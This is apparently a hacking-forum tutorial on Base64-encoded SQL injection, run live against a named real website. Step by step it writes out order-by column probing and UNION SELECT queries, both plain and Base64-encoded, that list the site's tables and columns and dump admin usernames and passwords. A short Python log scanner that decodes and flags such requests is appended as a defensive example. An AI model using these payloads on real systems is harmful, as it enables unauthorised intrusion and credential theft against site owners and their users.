Hello proleets, I hope you are fine today. I am going to teach you how we can inject a website using Base64-encoded queries, so let's start.
I already have a website with a Base64 injection:
=> http://aimschennai.in/viewpost.php?id=6
How do we know whether this website uses Base64 or not? When we try to find the number of columns with a simple order by and we get an error, it means this website may be using Base64, like this:
=> You can see that when I used the order by statement I got SQLi errors.
=> Now select the vulnerable id and the order by statement
=> 6 order by 1 (Encoding) No error
Click Base64 Encode and Execute
When we encode it, you can see that we don't get any error.
Now use this method to find the number of columns:
=> 6 order by 2 (Encoding) No error
=> 6 order by 3 (Encoding) No error
=> 6 order by 4 (Encoding) No error
=> 6 order by 10 (Encoding) Error, see screenshot
=> We got 8 columns, so now use a union select statement and encode it.
Click Base64 Encode, then execute it against the website.
You can see that we got the table number. Now simply use the table query and encode it:
Simple :- http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_Schema=database()--+-
Encode :-
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDQsNSw2LDcsOCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfU2NoZW1hPWRhdGFiYXNlKCktLSAt
We got the table data. Copy aims_user and find its columns with simple SQLi queries.
Decode the queries and find the table data:
Simple : http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=CHAR(97, 105, 109, 115, 95, 117, 115, 101, 114)-- -
Encode : http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSw0LDUsNiw3LDggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPUNIQVIoOTcsIDEwNSwgMTA5LCAxMTUsIDk1LCAxMTcsIDExNSwgMTAxLCAxMTQpLS0gLQ==
We got all the columns. Now we need the admin user and password; use simple SQLi queries and encode them:
Simple : http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(am_username,0x3a,am_password),4,5,6,7,8 from aims_user
Encode : http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGFtX3VzZXJuYW1lLDB4M2EsYW1fcGFzc3dvcmQpLDQsNSw2LDcsOCBmcm9tIGFpbXNfdXNlcg==
Finally we got the admin users and passwords.
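Seen from the defender's side, the Base64 wrapper means that keyword matching on raw access-log lines never sees the SQL. The following Python check is an added example, not part of the original post: it decodes the id parameter of each logged request and flags any value that is not a plain integer. The log format, the address and the function names are assumptions, and the sample lines are constructed.

```python
import base64, binascii, re
from urllib.parse import urlsplit, parse_qs

# SQL keywords taken from the statements shown in the post.
SQL_TOKENS = re.compile(
    r"\b(order\s+by|union|select|information_schema|group_concat)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INTEGER = re.compile(r"\s*[0-9]+\s*\Z")

def decode_b64(value):
    """Return the decoded text if value is valid Base64, else None."""
    value = value.replace(" ", "+")       # parse_qs turns '+' into a space
    value += "=" * (-len(value) % 4)      # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def classify_id(raw):
    """Return (verdict, text); text is the value after any Base64 decoding."""
    if INTEGER.match(raw):
        return "ok", raw
    if SQL_TOKENS.search(raw):
        return "sqli", raw
    decoded = decode_b64(raw)
    if decoded is None:
        return "suspicious", raw
    if INTEGER.match(decoded):
        return "ok", decoded
    return ("sqli" if SQL_TOKENS.search(decoded) else "suspicious"), decoded

def scan(log_lines, param="id"):
    """List (line_no, verdict, text) for each request whose id is not ok."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        query = urlsplit(m.group(1)).query if m else ""
        for raw in parse_qs(query).get(param, []):
            verdict, text = classify_id(raw)
            if verdict != "ok":
                hits.append((n, verdict, text))
    return hits

# Constructed sample log lines (documentation address, made-up sizes).
_b64 = lambda s: base64.b64encode(s.encode()).decode()
_LINE = '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /viewpost.php?id={} HTTP/1.1" 200 5120'
SAMPLE_LOG = [_LINE.format(v) for v in (
    "6", _b64("6"), _b64("6 order by 1"), "6%20order%20by%2010")]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A flagged line shows the decoded statement next to its log line number, so the same keyword rules used for plain requests apply to the encoded ones.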
=> I hope you like this tutorial. I am waiting for your comments; if you need help with this tutorial, PM me and I will help you :)
Join fb : Facebook.com/ProLeEtS